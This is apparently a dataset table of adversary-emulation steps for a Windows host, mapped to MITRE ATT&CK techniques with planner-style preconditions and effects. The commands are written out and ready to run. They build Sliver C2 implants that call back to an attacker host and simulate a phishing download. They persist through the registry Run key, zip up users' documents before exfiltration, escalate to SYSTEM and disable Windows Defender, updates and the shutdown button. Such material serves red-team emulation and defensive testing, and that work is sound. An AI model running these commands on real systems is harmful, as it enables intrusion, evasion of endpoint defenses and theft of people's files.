- Machine ID: host11
- OS: windows
- CVE: []
| uuid | name | id | source | supported_platforms | tactics | technique | description | execution | arguments | preconditions | effects |
|---|---|---|---|---|---|---|---|---|---|---|---|
| bb2176c4-855e-4b52-ab03-5fe2e58d8129 | Build DLL Sliver implant | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format shared --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(file_payload ?p - payload ?file - file)', '(dll_file ?file - file)', '(file_prepared_local ?file - file)', ' |
| 7480189e-1a4b-45f5-b225-c102915f7262 | Simulate the victim download a file on its machine | ['T1566.002'] | Manual | ['windows'] | ['Initial Access'] | ['Phishing: Spearphishing Link'] | This step simulates the victim accidentally downloads a malicious file by clicking a link. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)'] | ['(file_exists ?path - path ?file - file ?t - host)'] |
| 5b852063-ca39-4600-b246-024897721010 | Simulate the victim execute a DLL file on its machine | ['T1204.002'] | Manual | ['windows'] | ['Execution'] | ['User Execution: Malicious File'] | This step simulates the victim executes a DLL file on its machine. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On victim's machine, use PowerShell or Command Prompt)\nregsvr32 #{DLL_PATH}\n"} | {'DLL_PATH': {'default': None, 'description': 'Saved path of the DLL file', 'type': None}} | ['(file_exists ?path - path ?file - file ?t - host)', '(dll_file ?file - file)'] | ['(file_executed ?file - file ?t - host)'] |
| 1f401bbe-de24-41d2-8e34-d026e25bfb94 | Execute a Sliver Implant Payload | ['T1071.001'] | Sliver | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | Executing a Sliver implant payload will establish a Sliver session. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?t - host)', '(file_payload ?p - payload ?f - file)', '(file_executed ?f - file ?t - host)', '(unallocated ?s - executor)'] | ['(sliver_session ?s - executor ?t - host)', '~(unallocated ?s - executor)', {'operator': 'When', 'params': {'condition': '(file_executed_as_root ?f - file ?t - host)', 'effect': '(elevated_executor ?s - executor)'}}] |
| f9c1197c-c5ef-4368-a10c-3a53003dbfbf | Remote Directory Listing | ['T1083'] | Sliver | ['windows', 'linux', 'macos'] | ['Discovery'] | ['File and Directory Discovery'] | The ls <remote path> command lists files and directories in a specified remote path or the current directory if no path is provided. By default, it sorts listings by name in ascending order, but can also sort by size or modified time, with options to reverse the order. The command includes flags for sorting, reversing order, and setting a timeout. |
{'executor': 'Sliver Executor', 'command': 'ls(#{SessionID})'} | {'SessionID': {'default': None, 'description': 'The session ID of the active Sliver connection.', 'type': None}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(file_info_known ?t - host)'] |
| bc50eb97-4a6d-4a9d-b0b2-e9cf623a9106 | Build the executable file (service) of a Sliver implant (for Windows) | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a service executable payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format service --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(service_payload ?p - payload)', '(file_payload ?p - payload ?file - file)', '(file_prepared_local ?file - file)', '(exe_file ?file - file)', ' |
| 2074d817-7819-401b-b552-1045672f77f3 | Execute Command (cmd.exe) | ['T1059.003'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: Windows Command Shell\n'] | The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 7480189e-1a4b-45f5-b225-c102915f7262 | Simulate the victim download a file on its machine | ['T1566.002'] | Manual | ['windows'] | ['Initial Access'] | ['Phishing: Spearphishing Link'] | This step simulates the victim accidentally downloads a malicious file by clicking a link. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)'] | ['(file_exists ?path - path ?file - file ?t - host)'] |
| e55be3fd-3521-4610-9d1a-e210e42dcf05 | Reg Key Run | ['T1547.001'] | ART | ['windows'] | ['Persistence', 'Privilege Escalation'] | ['Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be via stdout. |
{'executor': 'Command Prompt Executor', 'command': 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"\n'} | {'command_to_execute': {'description': 'Thing to Run', 'type': 'path', 'default': 'C:\Path\AtomicRedTeam.exe'}} | ['(os_windows ?target - host)', '(command_prompt ?executor - executor ?target - host)', '(file_exists ?command_to_execute - path ?file - file ?target - host)', '(exe_file ?file - file)'] | ['(file_execution_at_startup ?file - file ?target - host)'] |
| f7f31777-1bbf-4ddc-b7a1-af9f46a5299b | Obtain a persistent Sliver Executor | [None] | Manual | ['windows', 'linux', 'macos'] | ['Persistence'] | [None] | Obtain the persistency of Sliver Executor via scheduled payload file execution. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?target - host)', '(file_payload ?p - payload ?f - file)', {'operator': 'or', 'operands': ['(file_execution_at_time ?f - file ?target - host)', '(file_execution_at_startup ?f - file ?target - host)']}, '(unallocated ?s - executor)'] | ['(persistent_sliver_session ?s - executor ?target - host)', '~(unallocated ?s - executor)'] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| d3d9af44-b8ad-4375-8b0a-4bff4b7e419c | Search files of interest and save them to a single zip file (Windows) | ['T1005'] | ART | ['windows'] | ['Collection'] | ['Data from Local System'] | This test searches for files of certain extensions and saves them to a single zip file prior to extraction. |
{'executor': 'Powershell Executor', 'command': '$startingDirectory = "C:"\n$outputZip = "#{output_zip_folder_path}"\n$fileExtensionsString = ".doc, .docx, .txt" \n$fileExtensions = $fileExtensionsString -split ", "\n\nNew-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null\n\nFunction Search-Files {\n param (\n [string]$directory\n )\n $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {\n $fileExtensions -contains $_.Extension.ToLower()\n }\n return $files\n}\n\n$foundFiles = Search-Files -directory $startingDirectory\nif ($foundFiles.Count -gt 0) {\n $foundFilePaths = $foundFiles.FullName\n Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"\n\n Write-Host "Zip file created: $outputZip\data.zip"\n } else {\n Write-Host "No files found with the specified extensions."\n }\n'} | {'output_zip_folder_path': {'description': 'Path to directory for saving the generated zip file', 'type': 'Path', 'default': 'PathToAtomicsFolder\..\ExternalPayloads\T1005'}} |
| b8cbd2a9-6967-4114-b2b5-162098f74a89 | Take Screenshot | ['T1113'] | Sliver | ['windows', 'linux', 'macos'] | ['Collection'] | ['Screen Capture'] | The screenshot() function takes a screenshot of the remote system with screenshot data in PNG format. |
{'executor': 'Sliver Executor', 'command': 'screenshot(#{SessionID})'} | {'SessionID': {'default': None, 'description': 'The session ID of the active Sliver connection.', 'type': None}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(screenshot_data_saved ?file - file ?t - host)', '(file_exists ?path - path ?file - file ?t - host)'] |
| 2e8f1a9c-0b5e-4a7c-b6d4-9a8b2d3c5f1e | Create Directory | ['T1106'] | Sliver | ['windows', 'linux'] | ['Persistence'] | ['File System Permissions Modification'] | The mkdir command creates a new directory on the target system. |
{'executor': 'Sliver Executor', 'command': 'mkdir (#{remote_path},#{SessionID})'} | {'remote_path': {'description': 'Full path of the directory to create'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?target - host)', '(os_linux ?target - host)']}, '(sliver_session ?executorID - executor ?target - host)'] | ['(dir_exists ?path - path ?dir - dir ?target - host)'] |
| 41410c60-614d-4b9d-b66e-b0192dd9c597 | Compress Data for Exfiltration With PowerShell | ['T1560'] | ART | ['windows'] | ['Collection'] | ['Archive Collected Data'] | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory |
{'executor': 'Powershell Executor', 'command': 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}\n'} | {'input_file': {'description': 'Path that should be compressed into our output file', 'type': 'path', 'default': '$env:USERPROFILE'}, 'output_file': {'description': 'Path where resulting compressed data should be placed', 'type': 'path', 'default': '$env:USERPROFILE\T1560-data-ps.zip'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(dir_exists ?input_file - path ?dir - dir ?target - host)'] |
| 5a1d2b9f-4e7f-8a4d-3f7a-6c2e5e9f9f7c | Privilege Escalation | ['T1134'] | Sliver | ['windows'] | ['Privilege Escalation'] | ['Access Token Manipulation'] | The get_system command attempts to gain SYSTEM-level privileges. |
{'executor': 'Sliver Executor', 'command': 'get_system (#{hosting_process},#{config},#{SessionID})'} | {'hosting_process': {'description': 'Target process ID or name for privilege escalation'}, 'config': {'description': 'Configuration options for escalation method', 'default': 'Service'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?target - host)', '(sliver_session ?executorID - executor ?target - host)'] | ['(elevated_executor ?executorID - executor)'] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 6b8df440-51ec-4d53-bf83-899591c9b5d7 | Tamper with Windows Defender ATP PowerShell | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. |
{'executor': 'Elevated Powershell Executor', 'command': 'Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n'} | None | ['(powershell ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(virus_and_threat_protection_disabled ?target - host)'] |
| 2074d817-7819-401b-b552-1045672f77f3 | Execute Command (cmd.exe) | ['T1059.003'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: Windows Command Shell\n'] | The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 | Remove Windows Defender Definition Files | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ |
{'executor': 'Elevated Command Prompt Executor', 'command': '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(anti_malware_disabled ?target - host)'] |
| 01b20ca8-c7a3-4d86-af59-059f15ed5474 | Disable Windows OS Auto Update | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Disable Auto Update Windows OS feature. Redline is using this as part of its defense evasion. |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(auto_update_disabled ?target - host)'] |
| 1f6743da-6ecc-4a93-b03f-dc357e4b313f | Tamper with Windows Defender Registry - Reg.exe | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe" |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f >NUL 2>nul \nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f >NUL 2>nul\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(windows_defender_disabled ?target - host)'] |
| 6e0d1131-2d7e-4905-8ca5-d6172f05d03d | Disable Windows Shutdown Button | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(shutdown_button_disabled ?target - host)'] |
| 2a78362e-b79a-4482-8e24-be397bce4d85 | Safe Mode Boot | ['T1562.009'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Safe Mode Boot'] | Allows adversaries to abuse safe mode to disable endpoint defenses that may not start with limited boot | {'executor': 'Elevated Command Prompt Executor', 'command': 'bcdedit /set safeboot network'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(endpoint_defense_disabled ?target - host)'] |